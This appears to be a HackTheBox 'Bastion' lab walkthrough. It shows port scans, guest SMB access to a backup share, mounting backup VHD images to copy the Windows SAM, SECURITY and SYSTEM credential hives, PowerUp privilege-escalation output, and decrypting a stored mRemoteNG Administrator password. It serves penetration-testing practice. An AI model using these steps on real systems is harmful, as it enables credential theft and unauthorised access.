Hackthebox - Bastion

  • Windows


Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-17 08:44 EDT
Nmap scan report for
Host is up (0.021s latency).
Not shown: 65522 closed tcp ports (reset)
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -39m58s, deviation: 1h09m14s, median: 0s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-09-17T14:46:28+02:00
| smb2-time: 
|   date: 2022-09-17T12:46:29
|_  start_date: 2022-09-17T12:43:20

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.62 seconds


  • While investing SMB we can launch a gobuster scan on the open http ports gobuster dir -u -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt and gobuster dir -u -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt

  • Nothing here (as the foothold seems to be done through smb really)


  • Looking at the nmap SMB seems worth investigating


└─$ enum4linux -a             
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Sep 17 09:00:52 2022

 =========================================( Target Information )=========================================
Target ...........                                                                                                                   
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ============================( Enumerating Workgroup/Domain on )============================
[E] Can't find workgroup/domain                                                                                                                                                                                
 ================================( Nbtstat Information for )================================

Looking up status of                                                                                                                 
No reply from

 ===================================( Session Check on )===================================
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.  


└─$ smbmap -H -u guest               
[+] IP:        Name:                                      
[-] Work[!] Unable to remove test directory at \\\Backups\QUZAVHPSBI, please remove manually
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Backups                                                 READ, WRITE
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC


└─$ smbclient -L \\                                                                                                                                                                                                          1 ⨯
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  • We finally are able to connect to a share this way:

└─$ smbclient //                                                                                                                                                                                                     1 ⨯
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Sep 17 09:11:08 2022
  ..                                  D        0  Sat Sep 17 09:11:08 2022
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  QUZAVHPSBI                          D        0  Sat Sep 17 09:11:08 2022
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 07:44:02 2019

                5638911 blocks of size 4096. 1173319 blocks available
smb: \> 
  • Let's get the content. We can get everything in a row using this set of commands

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
  • We have to abort this the note says:

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
  • Big hint to investigate this backup folder

  • Let's just have a look around for now

  • Here is an article by Jake Binstein that is interesting to better understand the folder (Check out the Structure part in the end). That is a start.

  • We have an info about the name of the pc and a potential user L4mpje-PC

  • Looking further in the files we find vhd images. Here is an article by Samuel Whang on how to mount this type of files

vhd file

  • Following Samuel Whang article, we first create a dir to mount the remote share sudo mkdir /mnt/remote

  • Note: I am going to sudo su for the rest of the process

  • Let's create a mount point for the first vhd file mkdir /mnt/vhd1

  • Let's now mount it with guestmount guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd1 -v

  • Let's do the same last step for the 2nd vhd file

  • mkdir /mnt/vhd2

  • guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd2 -v

  • In my case it worked for the 2nd file only. I am going to inspect it and then trouble shot the 1st file in case (note: I realized later that one is a boot partition and the other the disk so that is why one of the image is useless for us)

  • Let's copy the SAM, Security and system files in my working directory cp SAM SECURITY SYSTEM ../../../../../home/kali/Documents/hackthebox/bastion

  • Let's try the password on ssh

  • Also we can not that according to the admin hash we see that it is not stored as an lm hash (blank or null)



  • Let's get winpeas in the target. Nothing really

  • PowerUp is more verbose. It seems to be dll hijack

ModifiablePath    : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps                                                                                                                                                                      
IdentityReference : BASTION\L4mpje                                                                                                                                                                                                           
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}                                                                                                                                                                    
%PATH%            : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps                                                                                                                                                                      
Name              : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps                                                                                                                                                                      
Check             : %PATH% .dll Hijacks                                                                                                                                                                                                      
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll' 
  • I tried the techniques listed here, however with our current rights nothing works...

  • Let's go back to manual enum

PS C:\Users\L4mpje> cmd /c echo %PATH%                                                                                                                                                                                                       
C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\OpenSSH-Win                                                                                                             
  • In the programs this one is unusual mRemoteNG. We can have a look at the changelog to get the version that seems to be 1.76.11

  • After a google search we get this article. So this article turns used this same box as an example... it is a big spoil xD. But in a real context we would have looked in the configuration files anyway and google something like "decrypt mremoteng passwords" or something similar.

  • Indeed the file confCons.xml contains a password

Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
  • We can follow step 3 of the article python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

Last updated